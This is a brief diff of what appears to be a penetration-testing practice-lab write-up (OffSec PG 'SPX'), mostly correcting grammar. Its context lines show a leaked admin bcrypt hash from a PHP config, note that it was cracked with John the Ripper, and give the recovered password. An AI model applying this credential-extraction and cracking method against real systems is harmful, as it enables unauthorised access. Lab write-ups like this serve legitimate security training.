mglx01/Offsec_PG_Practice/Linux/SPX.md

 Upgrade-Insecure-Requests: 1
 Priority: u=0, i
 ```
-we got responded  with the admin hash
+we got a respond with the admin hash
 ```console
 $auth_users = array(
     'admin' => '$2y$10$7LaMUa8an8NrvnQsj5xZ3eDdOejgLyXE8IIvsC.hFy1dg7rPb9cqG',
 ```
 crack it with john the ripper
-it take quit a while but we got it
+it takes quit a while but we finally got it
 ```console
 admin : lowprofile
 ```